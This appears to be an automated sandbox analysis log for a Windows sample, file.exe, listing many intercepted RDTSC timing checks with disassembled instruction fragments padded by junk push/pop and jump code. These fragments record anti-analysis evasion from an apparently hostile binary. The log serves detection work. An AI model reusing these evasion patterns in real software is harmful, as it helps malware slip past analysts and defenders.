Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6A2E88 second address: 6A2E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jo 00007F45A8838C76h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AC1D1 second address: 6AC1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A84F3309h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6AC1F0 second address: 6AC20E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A8838C86h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ABBF9 second address: 6ABBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ABBFD second address: 6ABC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ABC03 second address: 6ABC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ABC09 second address: 6ABC42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F45A8838C76h 0x00000009 jmp 00007F45A8838C7Ah 0x0000000e jmp 00007F45A8838C7Dh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edi 0x00000017 ja 00007F45A8838C82h 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ABDA3 second address: 6ABDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BB296 second address: 6BB29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BB3EC second address: 6BB40E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e jl 00007F45A84F32F6h 0x00000014 popad 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BB40E second address: 6BB430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F45A8838C7Fh 0x0000000d js 00007F45A8838C76h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BB430 second address: 6BB436 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BB436 second address: 6BB43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BB43C second address: 6BB440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BD6D1 second address: 6BD6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BD6D5 second address: 6BD6FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F45A84F3309h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BD6FC second address: 6BD702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6BD702 second address: 6BD737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45A84F3306h 0x00000009 popad 0x0000000a jnc 00007F45A84F330Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6C9AD4 second address: 6C9AE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007F45A8838C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DA729 second address: 6DA732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DA732 second address: 6DA742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 jc 00007F45A8838C8Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D92BC second address: 6D92C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D9545 second address: 6D9551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F45A8838C78h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D9551 second address: 6D955B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F45A84F32F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D955B second address: 6D955F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D955F second address: 6D9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jc 00007F45A84F32F6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D9A22 second address: 6D9A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D9A26 second address: 6D9A3F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F45A84F32F6h 0x00000008 jmp 00007F45A84F32FFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DA452 second address: 6DA45C instructions: 0x00000000 rdtsc 0x00000002 js 00007F45A8838C76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6DDC20 second address: 6DDC4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F45A84F32FBh 0x0000000a popad 0x0000000b ja 00007F45A84F3316h 0x00000011 push edx 0x00000012 jmp 00007F45A84F32FEh 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ECFC1 second address: 6ECFFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C88h 0x00000007 jmp 00007F45A8838C88h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ECFFA second address: 6ED005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED005 second address: 6ED009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED009 second address: 6ED00F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FBD92 second address: 6FBD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FBD9A second address: 6FBDB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jnc 00007F45A84F32F8h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FBDB0 second address: 6FBDBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7002BA second address: 7002D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45A84F32FBh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jno 00007F45A84F32F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7002D8 second address: 7002E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A3C3 second address: 71A3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 je 00007F45A84F32F6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A520 second address: 71A52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A52B second address: 71A52F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A52F second address: 71A553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F45A8838C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F45A8838C84h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A553 second address: 71A557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A557 second address: 71A575 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71AEEF second address: 71AEFA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007F45A84F32F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F5E8 second address: 71F5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71F5EC second address: 71F5F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0F16 second address: 4DB0F61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 4847h 0x00000007 push esi 0x00000008 pop edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F45A8838C84h 0x00000014 add cl, 00000028h 0x00000017 jmp 00007F45A8838C7Bh 0x0000001c popfd 0x0000001d mov ecx, 0BD5031Fh 0x00000022 popad 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F45A8838C80h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0F61 second address: 4DB0F67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0F67 second address: 4DB0F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0F6B second address: 4DB0F8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F45A84F3304h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0E19 second address: 4DA0E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, 98h 0x0000000d movzx ecx, dx 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F45A8838C7Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0E4F second address: 4DA0E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F45A84F3306h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0032 second address: 4DF0038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0038 second address: 4DF003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF003C second address: 4DF0040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0040 second address: 4DF0094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, ax 0x0000000d mov bh, ah 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F45A84F3301h 0x00000018 jmp 00007F45A84F32FBh 0x0000001d popfd 0x0000001e mov ax, 09FFh 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F45A84F3307h 0x0000002d push esi 0x0000002e pop edi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DF0094 second address: 4DF00A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A8838C80h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D800CB second address: 4D800CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D800CF second address: 4D800D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D800D5 second address: 4D800EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A84F3303h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D800EC second address: 4D80145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F45A8838C83h 0x00000015 sbb eax, 6B29DBEEh 0x0000001b jmp 00007F45A8838C89h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80145 second address: 4D8014A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D8014A second address: 4D801C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F45A8838C84h 0x00000012 jmp 00007F45A8838C85h 0x00000017 popfd 0x00000018 pushad 0x00000019 mov ecx, 5129BA0Dh 0x0000001e jmp 00007F45A8838C7Ah 0x00000023 popad 0x00000024 popad 0x00000025 push dword ptr [ebp+04h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F45A8838C87h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D801C1 second address: 4D801FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, F6h 0x00000005 mov eax, 1F29A207h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [ebp+0Ch] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F45A84F3306h 0x00000019 and esi, 3C69F4E8h 0x0000001f jmp 00007F45A84F32FBh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D801FD second address: 4D8022A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushfd 0x00000008 jmp 00007F45A8838C82h 0x0000000d sbb si, 0748h 0x00000012 jmp 00007F45A8838C7Bh 0x00000017 popfd 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D80253 second address: 4D80270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0B70 second address: 4DA0BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45A8838C7Fh 0x00000009 or ah, 0000002Eh 0x0000000c jmp 00007F45A8838C89h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F45A8838C80h 0x00000018 sbb ecx, 543383A8h 0x0000001e jmp 00007F45A8838C7Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F45A8838C85h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0BDE second address: 4DA0C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov di, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F45A84F3305h 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F45A84F32FEh 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0C17 second address: 4DA0C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0671 second address: 4DA0695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F3301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F45A84F32FCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0695 second address: 4DA06A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A8838C7Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA06A7 second address: 4DA06FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A84F32FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F45A84F32FBh 0x00000014 pop ecx 0x00000015 pushfd 0x00000016 jmp 00007F45A84F3309h 0x0000001b and ax, 8A76h 0x00000020 jmp 00007F45A84F3301h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA06FA second address: 4DA070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A8838C7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA070A second address: 4DA071A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA071A second address: 4DA071E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA071E second address: 4DA0724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA0724 second address: 4DA072C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA072C second address: 4DA074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45A84F3305h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA074B second address: 4DA0750 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA05AF second address: 4DA05BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA05BC second address: 4DA05CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA05CA second address: 4DA05DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45A84F32FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA05DC second address: 4DA05E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA05E0 second address: 4DA05F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov edx, ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DA02C3 second address: 4DA0308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45A8838C84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F45A8838C80h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F45A8838C87h 0x00000019 rdtsc
